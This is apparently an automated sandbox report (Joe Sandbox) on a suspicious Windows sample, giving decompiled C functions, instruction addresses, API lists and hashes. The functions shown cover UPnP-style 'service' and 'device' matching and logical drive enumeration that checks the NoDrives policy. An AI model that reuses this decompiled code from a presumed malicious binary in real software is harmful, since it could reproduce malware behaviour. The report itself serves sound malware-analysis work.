                                                                                                                                                                                                                                                                                    								 *((intOrPtr*)(_t49 + 0x224)) = 0x200;
                                                                                                                                                                                                                                                                                    								 *((intOrPtr*)(_t49 + 0x228)) = _t15;
                                                                                                                                                                                                                                                                                    								InitializeCriticalSection(_t14);
                                                                                                                                                                                                                                                                                    								InterlockedIncrement(_t45 + 0x3c);
                                                                                                                                                                                                                                                                                    								E0040DEB0(_t49);
                                                                                                                                                                                                                                                                                    								return _t49;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                                                    						return 0;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                                                    					return 0;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    			}













                                                                                                                                                                                                                                                                                    0x0040df91
                                                                                                                                                                                                                                                                                    0x0040df96
                                                                                                                                                                                                                                                                                    0x0040df9b
                                                                                                                                                                                                                                                                                    0x0040dfa4
                                                                                                                                                                                                                                                                                    0x0040dfa8
                                                                                                                                                                                                                                                                                    0x0040dfaa
                                                                                                                                                                                                                                                                                    0x0040dfb0
                                                                                                                                                                                                                                                                                    0x0040dfb5
                                                                                                                                                                                                                                                                                    0x0040dfb7
                                                                                                                                                                                                                                                                                    0x0040dfbf
                                                                                                                                                                                                                                                                                    0x0040dfc7
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040dfc9
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040dfc7
                                                                                                                                                                                                                                                                                    0x0040dfcb
                                                                                                                                                                                                                                                                                    0x0040dfcb
                                                                                                                                                                                                                                                                                    0x0040dfcd
                                                                                                                                                                                                                                                                                    0x0040dfce
                                                                                                                                                                                                                                                                                    0x0040dfd6
                                                                                                                                                                                                                                                                                    0x0040dfe9
                                                                                                                                                                                                                                                                                    0x0040dfeb
                                                                                                                                                                                                                                                                                    0x0040dff0
                                                                                                                                                                                                                                                                                    0x0040e08d
                                                                                                                                                                                                                                                                                    0x0040e08e
                                                                                                                                                                                                                                                                                    0x0040e09c
                                                                                                                                                                                                                                                                                    0x0040dff6
                                                                                                                                                                                                                                                                                    0x0040dffb
                                                                                                                                                                                                                                                                                    0x0040e003
                                                                                                                                                                                                                                                                                    0x0040e009
                                                                                                                                                                                                                                                                                    0x0040e00f
                                                                                                                                                                                                                                                                                    0x0040e017
                                                                                                                                                                                                                                                                                    0x0040e034
                                                                                                                                                                                                                                                                                    0x0040e083
                                                                                                                                                                                                                                                                                    0x0040e088
                                                                                                                                                                                                                                                                                    0x0040e08b
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040e036
                                                                                                                                                                                                                                                                                    0x0040e036
                                                                                                                                                                                                                                                                                    0x0040e03c
                                                                                                                                                                                                                                                                                    0x0040e040
                                                                                                                                                                                                                                                                                    0x0040e046
                                                                                                                                                                                                                                                                                    0x0040e04c
                                                                                                                                                                                                                                                                                    0x0040e050
                                                                                                                                                                                                                                                                                    0x0040e056
                                                                                                                                                                                                                                                                                    0x0040e060
                                                                                                                                                                                                                                                                                    0x0040e066
                                                                                                                                                                                                                                                                                    0x0040e070
                                                                                                                                                                                                                                                                                    0x0040e076
                                                                                                                                                                                                                                                                                    0x0040e081
                                                                                                                                                                                                                                                                                    0x0040e081
                                                                                                                                                                                                                                                                                    0x0040e034
                                                                                                                                                                                                                                                                                    0x0040dfd8
                                                                                                                                                                                                                                                                                    0x0040dfde
                                                                                                                                                                                                                                                                                    0x0040dfde
                                                                                                                                                                                                                                                                                    0x0040df9e
                                                                                                                                                                                                                                                                                    0x0040dfa1
                                                                                                                                                                                                                                                                                    0x0040dfa1

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?,?,?,?,?,0040E49B,00000000), ref: 0040DFAA
                                                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,0040E49B,00000000), ref: 0040DFCE
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000006.00000002.409103266.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409098401.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409115174.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409120956.0000000000414000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_ sysesvcmw.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3168844106-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 4bbc681d7c9b78df020861981114938a0f21831a1cbc421abd2649154505d8b2
                                                                                                                                                                                                                                                                                    • Instruction ID: 788f702b9492d2748fa33cb2f0bef3e81c848d8eff2aac60f157a8f848454262
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4bbc681d7c9b78df020861981114938a0f21831a1cbc421abd2649154505d8b2
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EC31D472601615ABC710AFB5EC88BD7B7E8FF44724F00893EF54AD3281DB39A4448B99
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 55%
                                                                                                                                                                                                                                                                                    			E0040C741() {
                                                                                                                                                                                                                                                                                    				void* _t85;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				L0:
                                                                                                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                                                                                                    					L0:
                                                                                                                                                                                                                                                                                    					 *((intOrPtr*)(_t85 - 0xc)) =  *((intOrPtr*)(_t85 - 0xc)) + 1;
                                                                                                                                                                                                                                                                                    					if( *((intOrPtr*)(_t85 - 0xc)) >=  *((intOrPtr*)(_t85 - 4))) {
                                                                                                                                                                                                                                                                                    						break;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					L2:
                                                                                                                                                                                                                                                                                    					 *(_t85 - 0x10) = 0;
                                                                                                                                                                                                                                                                                    					_push(_t85 - 0x10);
                                                                                                                                                                                                                                                                                    					_push( *((intOrPtr*)(_t85 - 0xc)));
                                                                                                                                                                                                                                                                                    					_push( *((intOrPtr*)(_t85 + 8)));
                                                                                                                                                                                                                                                                                    					if( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t85 + 8)))) + 0x1c))))() != 0 ||  *(_t85 - 0x10) == 0) {
                                                                                                                                                                                                                                                                                    						L18:
                                                                                                                                                                                                                                                                                    						continue;
                                                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                                                    						L4:
                                                                                                                                                                                                                                                                                    						 *(_t85 - 0x14) = 0;
                                                                                                                                                                                                                                                                                    						_push(_t85 - 0x14);
                                                                                                                                                                                                                                                                                    						_push( *(_t85 - 0x10));
                                                                                                                                                                                                                                                                                    						if( *((intOrPtr*)( *((intOrPtr*)( *( *(_t85 - 0x10)) + 0xa4))))() == 0 &&  *(_t85 - 0x14) != 0) {
                                                                                                                                                                                                                                                                                    							L6:
                                                                                                                                                                                                                                                                                    							if(lstrcmpiW( *(_t85 - 0x14), L"service") == 0) {
                                                                                                                                                                                                                                                                                    								L7:
                                                                                                                                                                                                                                                                                    								 *((intOrPtr*)(_t85 - 0x18)) = E0040C200( *(_t85 - 0x10), L"serviceType");
                                                                                                                                                                                                                                                                                    								if( *((intOrPtr*)(_t85 - 0x18)) != 0) {
                                                                                                                                                                                                                                                                                    									L8:
                                                                                                                                                                                                                                                                                    									 *(_t85 - 0x1c) = 0;
                                                                                                                                                                                                                                                                                    									_push(_t85 - 0x1c);
                                                                                                                                                                                                                                                                                    									_push( *((intOrPtr*)(_t85 - 0x18)));
                                                                                                                                                                                                                                                                                    									if( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t85 - 0x18)))) + 0x68))))() == 0 &&  *(_t85 - 0x1c) != 0) {
                                                                                                                                                                                                                                                                                    										L10:
                                                                                                                                                                                                                                                                                    										if(lstrcmpiW( *(_t85 - 0x1c),  *(_t85 + 0xc)) == 0) {
                                                                                                                                                                                                                                                                                    											 *(_t85 - 8) =  *(_t85 - 0x10);
                                                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                                                    										L12:
                                                                                                                                                                                                                                                                                    										__imp__#6( *(_t85 - 0x1c));
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    									L13:
                                                                                                                                                                                                                                                                                    									 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t85 - 0x18)))) + 8))))( *((intOrPtr*)(_t85 - 0x18)));
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							L14:
                                                                                                                                                                                                                                                                                    							__imp__#6( *(_t85 - 0x14));
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						L15:
                                                                                                                                                                                                                                                                                    						if( *(_t85 - 8) == 0) {
                                                                                                                                                                                                                                                                                    							L17:
                                                                                                                                                                                                                                                                                    							 *((intOrPtr*)( *((intOrPtr*)( *( *(_t85 - 0x10)) + 8))))( *(_t85 - 0x10));
                                                                                                                                                                                                                                                                                    							goto L18;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					break;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				L19:
                                                                                                                                                                                                                                                                                    				return  *(_t85 - 8);
                                                                                                                                                                                                                                                                                    			}




                                                                                                                                                                                                                                                                                    0x0040c741
                                                                                                                                                                                                                                                                                    0x0040c741
                                                                                                                                                                                                                                                                                    0x0040c741
                                                                                                                                                                                                                                                                                    0x0040c747
                                                                                                                                                                                                                                                                                    0x0040c750
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040c756
                                                                                                                                                                                                                                                                                    0x0040c756
                                                                                                                                                                                                                                                                                    0x0040c760
                                                                                                                                                                                                                                                                                    0x0040c764
                                                                                                                                                                                                                                                                                    0x0040c76d
                                                                                                                                                                                                                                                                                    0x0040c775
                                                                                                                                                                                                                                                                                    0x0040c853
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040c785
                                                                                                                                                                                                                                                                                    0x0040c785
                                                                                                                                                                                                                                                                                    0x0040c785
                                                                                                                                                                                                                                                                                    0x0040c78f
                                                                                                                                                                                                                                                                                    0x0040c798
                                                                                                                                                                                                                                                                                    0x0040c7a3
                                                                                                                                                                                                                                                                                    0x0040c7b3
                                                                                                                                                                                                                                                                                    0x0040c7c4
                                                                                                                                                                                                                                                                                    0x0040c7c6
                                                                                                                                                                                                                                                                                    0x0040c7d7
                                                                                                                                                                                                                                                                                    0x0040c7de
                                                                                                                                                                                                                                                                                    0x0040c7e0
                                                                                                                                                                                                                                                                                    0x0040c7e0
                                                                                                                                                                                                                                                                                    0x0040c7ea
                                                                                                                                                                                                                                                                                    0x0040c7f3
                                                                                                                                                                                                                                                                                    0x0040c7fb
                                                                                                                                                                                                                                                                                    0x0040c803
                                                                                                                                                                                                                                                                                    0x0040c813
                                                                                                                                                                                                                                                                                    0x0040c818
                                                                                                                                                                                                                                                                                    0x0040c818
                                                                                                                                                                                                                                                                                    0x0040c81b
                                                                                                                                                                                                                                                                                    0x0040c81f
                                                                                                                                                                                                                                                                                    0x0040c81f
                                                                                                                                                                                                                                                                                    0x0040c825
                                                                                                                                                                                                                                                                                    0x0040c831
                                                                                                                                                                                                                                                                                    0x0040c831
                                                                                                                                                                                                                                                                                    0x0040c7de
                                                                                                                                                                                                                                                                                    0x0040c833
                                                                                                                                                                                                                                                                                    0x0040c837
                                                                                                                                                                                                                                                                                    0x0040c837
                                                                                                                                                                                                                                                                                    0x0040c83d
                                                                                                                                                                                                                                                                                    0x0040c841
                                                                                                                                                                                                                                                                                    0x0040c845
                                                                                                                                                                                                                                                                                    0x0040c851
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040c851
                                                                                                                                                                                                                                                                                    0x0040c841
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040c775
                                                                                                                                                                                                                                                                                    0x0040c858
                                                                                                                                                                                                                                                                                    0x0040c85e

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • lstrcmpiW.KERNEL32(00000000,service), ref: 0040C7BC
                                                                                                                                                                                                                                                                                    • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040C80B
                                                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040C81F
                                                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040C837
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000006.00000002.409103266.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409098401.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409115174.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409120956.0000000000414000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_ sysesvcmw.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: FreeStringlstrcmpi
                                                                                                                                                                                                                                                                                    • String ID: service$serviceType
                                                                                                                                                                                                                                                                                    • API String ID: 1602765415-3667235276
                                                                                                                                                                                                                                                                                    • Opcode ID: 57d823261c39902ee773dc23455852ca3ca2d32db1bb6f44af686056f0d9f317
                                                                                                                                                                                                                                                                                    • Instruction ID: a2ae9d540b18a7237781164838fed95b9af08367ec0547399f69e9a392117d82
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 57d823261c39902ee773dc23455852ca3ca2d32db1bb6f44af686056f0d9f317
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5631CA75E0020ADFCB04DF98D884BAFB7B5AF88305F108669E515A7390D7789A85CB98
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 55%
                                                                                                                                                                                                                                                                                    			E0040C921() {
                                                                                                                                                                                                                                                                                    				void* _t85;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				L0:
                                                                                                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                                                                                                    					L0:
                                                                                                                                                                                                                                                                                    					 *((intOrPtr*)(_t85 - 0xc)) =  *((intOrPtr*)(_t85 - 0xc)) + 1;
                                                                                                                                                                                                                                                                                    					if( *((intOrPtr*)(_t85 - 0xc)) >=  *((intOrPtr*)(_t85 - 4))) {
                                                                                                                                                                                                                                                                                    						break;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					L2:
                                                                                                                                                                                                                                                                                    					 *(_t85 - 0x10) = 0;
                                                                                                                                                                                                                                                                                    					_push(_t85 - 0x10);
                                                                                                                                                                                                                                                                                    					_push( *((intOrPtr*)(_t85 - 0xc)));
                                                                                                                                                                                                                                                                                    					_push( *((intOrPtr*)(_t85 + 8)));
                                                                                                                                                                                                                                                                                    					if( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t85 + 8)))) + 0x1c))))() != 0 ||  *(_t85 - 0x10) == 0) {
                                                                                                                                                                                                                                                                                    						L18:
                                                                                                                                                                                                                                                                                    						continue;
                                                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                                                    						L4:
                                                                                                                                                                                                                                                                                    						 *(_t85 - 0x14) = 0;
                                                                                                                                                                                                                                                                                    						_push(_t85 - 0x14);
                                                                                                                                                                                                                                                                                    						_push( *(_t85 - 0x10));
                                                                                                                                                                                                                                                                                    						if( *((intOrPtr*)( *((intOrPtr*)( *( *(_t85 - 0x10)) + 0xa4))))() == 0 &&  *(_t85 - 0x14) != 0) {
                                                                                                                                                                                                                                                                                    							L6:
                                                                                                                                                                                                                                                                                    							if(lstrcmpiW( *(_t85 - 0x14), L"device") == 0) {
                                                                                                                                                                                                                                                                                    								L7:
                                                                                                                                                                                                                                                                                    								 *((intOrPtr*)(_t85 - 0x18)) = E0040C200( *(_t85 - 0x10), L"deviceType");
                                                                                                                                                                                                                                                                                    								if( *((intOrPtr*)(_t85 - 0x18)) != 0) {
                                                                                                                                                                                                                                                                                    									L8:
                                                                                                                                                                                                                                                                                    									 *(_t85 - 0x1c) = 0;
                                                                                                                                                                                                                                                                                    									_push(_t85 - 0x1c);
                                                                                                                                                                                                                                                                                    									_push( *((intOrPtr*)(_t85 - 0x18)));
                                                                                                                                                                                                                                                                                    									if( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t85 - 0x18)))) + 0x68))))() == 0 &&  *(_t85 - 0x1c) != 0) {
                                                                                                                                                                                                                                                                                    										L10:
                                                                                                                                                                                                                                                                                    										if(lstrcmpiW( *(_t85 - 0x1c),  *(_t85 + 0xc)) == 0) {
                                                                                                                                                                                                                                                                                    											 *(_t85 - 8) =  *(_t85 - 0x10);
                                                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                                                    										L12:
                                                                                                                                                                                                                                                                                    										__imp__#6( *(_t85 - 0x1c));
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    									L13:
                                                                                                                                                                                                                                                                                    									 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t85 - 0x18)))) + 8))))( *((intOrPtr*)(_t85 - 0x18)));
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							L14:
                                                                                                                                                                                                                                                                                    							__imp__#6( *(_t85 - 0x14));
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						L15:
                                                                                                                                                                                                                                                                                    						if( *(_t85 - 8) == 0) {
                                                                                                                                                                                                                                                                                    							L17:
                                                                                                                                                                                                                                                                                    							 *((intOrPtr*)( *((intOrPtr*)( *( *(_t85 - 0x10)) + 8))))( *(_t85 - 0x10));
                                                                                                                                                                                                                                                                                    							goto L18;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					break;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				L19:
                                                                                                                                                                                                                                                                                    				return  *(_t85 - 8);
                                                                                                                                                                                                                                                                                    			}




                                                                                                                                                                                                                                                                                    0x0040c921
                                                                                                                                                                                                                                                                                    0x0040c921
                                                                                                                                                                                                                                                                                    0x0040c921
                                                                                                                                                                                                                                                                                    0x0040c927
                                                                                                                                                                                                                                                                                    0x0040c930
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040c936
                                                                                                                                                                                                                                                                                    0x0040c936
                                                                                                                                                                                                                                                                                    0x0040c940
                                                                                                                                                                                                                                                                                    0x0040c944
                                                                                                                                                                                                                                                                                    0x0040c94d
                                                                                                                                                                                                                                                                                    0x0040c955
                                                                                                                                                                                                                                                                                    0x0040ca33
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040c965
                                                                                                                                                                                                                                                                                    0x0040c965
                                                                                                                                                                                                                                                                                    0x0040c965
                                                                                                                                                                                                                                                                                    0x0040c96f
                                                                                                                                                                                                                                                                                    0x0040c978
                                                                                                                                                                                                                                                                                    0x0040c983
                                                                                                                                                                                                                                                                                    0x0040c993
                                                                                                                                                                                                                                                                                    0x0040c9a4
                                                                                                                                                                                                                                                                                    0x0040c9a6
                                                                                                                                                                                                                                                                                    0x0040c9b7
                                                                                                                                                                                                                                                                                    0x0040c9be
                                                                                                                                                                                                                                                                                    0x0040c9c0
                                                                                                                                                                                                                                                                                    0x0040c9c0
                                                                                                                                                                                                                                                                                    0x0040c9ca
                                                                                                                                                                                                                                                                                    0x0040c9d3
                                                                                                                                                                                                                                                                                    0x0040c9db
                                                                                                                                                                                                                                                                                    0x0040c9e3
                                                                                                                                                                                                                                                                                    0x0040c9f3
                                                                                                                                                                                                                                                                                    0x0040c9f8
                                                                                                                                                                                                                                                                                    0x0040c9f8
                                                                                                                                                                                                                                                                                    0x0040c9fb
                                                                                                                                                                                                                                                                                    0x0040c9ff
                                                                                                                                                                                                                                                                                    0x0040c9ff
                                                                                                                                                                                                                                                                                    0x0040ca05
                                                                                                                                                                                                                                                                                    0x0040ca11
                                                                                                                                                                                                                                                                                    0x0040ca11
                                                                                                                                                                                                                                                                                    0x0040c9be
                                                                                                                                                                                                                                                                                    0x0040ca13
                                                                                                                                                                                                                                                                                    0x0040ca17
                                                                                                                                                                                                                                                                                    0x0040ca17
                                                                                                                                                                                                                                                                                    0x0040ca1d
                                                                                                                                                                                                                                                                                    0x0040ca21
                                                                                                                                                                                                                                                                                    0x0040ca25
                                                                                                                                                                                                                                                                                    0x0040ca31
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040ca31
                                                                                                                                                                                                                                                                                    0x0040ca21
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040c955
                                                                                                                                                                                                                                                                                    0x0040ca38
                                                                                                                                                                                                                                                                                    0x0040ca3e

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • lstrcmpiW.KERNEL32(00000000,device), ref: 0040C99C
                                                                                                                                                                                                                                                                                    • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040C9EB
                                                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040C9FF
                                                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040CA17
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000006.00000002.409103266.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409098401.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409115174.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409120956.0000000000414000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_ sysesvcmw.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: FreeStringlstrcmpi
                                                                                                                                                                                                                                                                                    • String ID: device$deviceType
                                                                                                                                                                                                                                                                                    • API String ID: 1602765415-3511266565
                                                                                                                                                                                                                                                                                    • Opcode ID: d1e252de239358218e20ca43259cf9d3f4c29c9aecec0edfa49fab37b6abc5cc
                                                                                                                                                                                                                                                                                    • Instruction ID: 13aee1176452d62b74ac46d26b233db62756319b53bb87b3b8849ed906738a0f
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d1e252de239358218e20ca43259cf9d3f4c29c9aecec0edfa49fab37b6abc5cc
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7B31C974E0020ADBCB14CF99D894BAFB7B5AF88304F108269E515B7390D7789A85CF94
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                    			E00404CB0() {
                                                                                                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                                                                                                                                                    				signed int _v16;
                                                                                                                                                                                                                                                                                    				long _v20;
                                                                                                                                                                                                                                                                                    				signed int _v24;
                                                                                                                                                                                                                                                                                    				void* _v28;
                                                                                                                                                                                                                                                                                    				char _v32;
                                                                                                                                                                                                                                                                                    				int _v36;
                                                                                                                                                                                                                                                                                    				void* _t44;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_v20 = GetLogicalDrives();
                                                                                                                                                                                                                                                                                    				_v16 = 0;
                                                                                                                                                                                                                                                                                    				_v12 = 0x80000002;
                                                                                                                                                                                                                                                                                    				_v8 = 0x80000001;
                                                                                                                                                                                                                                                                                    				_v24 = 0;
                                                                                                                                                                                                                                                                                    				while(_v24 < 2) {
                                                                                                                                                                                                                                                                                    					if(RegOpenKeyExW( *(_t44 + _v24 * 4 - 8), L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer", 0, 0x20019,  &_v28) == 0) {
                                                                                                                                                                                                                                                                                    						_v32 = 0;
                                                                                                                                                                                                                                                                                    						_v36 = 4;
                                                                                                                                                                                                                                                                                    						if(RegQueryValueExW(_v28, L"NoDrives", 0, 0,  &_v32,  &_v36) == 0 && _v32 != 0) {
                                                                                                                                                                                                                                                                                    							_v16 = _v16 | _v32;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						RegCloseKey(_v28);
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					_v24 = _v24 + 1;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				return  !_v16 & _v20;
                                                                                                                                                                                                                                                                                    			}












                                                                                                                                                                                                                                                                                    0x00404cbc
                                                                                                                                                                                                                                                                                    0x00404cbf
                                                                                                                                                                                                                                                                                    0x00404cc6
                                                                                                                                                                                                                                                                                    0x00404ccd
                                                                                                                                                                                                                                                                                    0x00404cd4
                                                                                                                                                                                                                                                                                    0x00404ce6
                                                                                                                                                                                                                                                                                    0x00404d0c
                                                                                                                                                                                                                                                                                    0x00404d0e
                                                                                                                                                                                                                                                                                    0x00404d15
                                                                                                                                                                                                                                                                                    0x00404d39
                                                                                                                                                                                                                                                                                    0x00404d47
                                                                                                                                                                                                                                                                                    0x00404d47
                                                                                                                                                                                                                                                                                    0x00404d4e
                                                                                                                                                                                                                                                                                    0x00404d4e
                                                                                                                                                                                                                                                                                    0x00404ce3
                                                                                                                                                                                                                                                                                    0x00404ce3
                                                                                                                                                                                                                                                                                    0x00404d61

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetLogicalDrives.KERNEL32 ref: 00404CB6
                                                                                                                                                                                                                                                                                    • RegOpenKeyExW.ADVAPI32 ref: 00404D04
                                                                                                                                                                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,NoDrives,00000000,00000000,00000000,00000004), ref: 00404D31
                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00404D4E
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    • NoDrives, xrefs: 00404D28
                                                                                                                                                                                                                                                                                    • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, xrefs: 00404CF7
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000006.00000002.409103266.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409098401.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409115174.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409120956.0000000000414000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_ sysesvcmw.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CloseDrivesLogicalOpenQueryValue
                                                                                                                                                                                                                                                                                    • String ID: NoDrives$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
                                                                                                                                                                                                                                                                                    • API String ID: 2666887985-3471754645
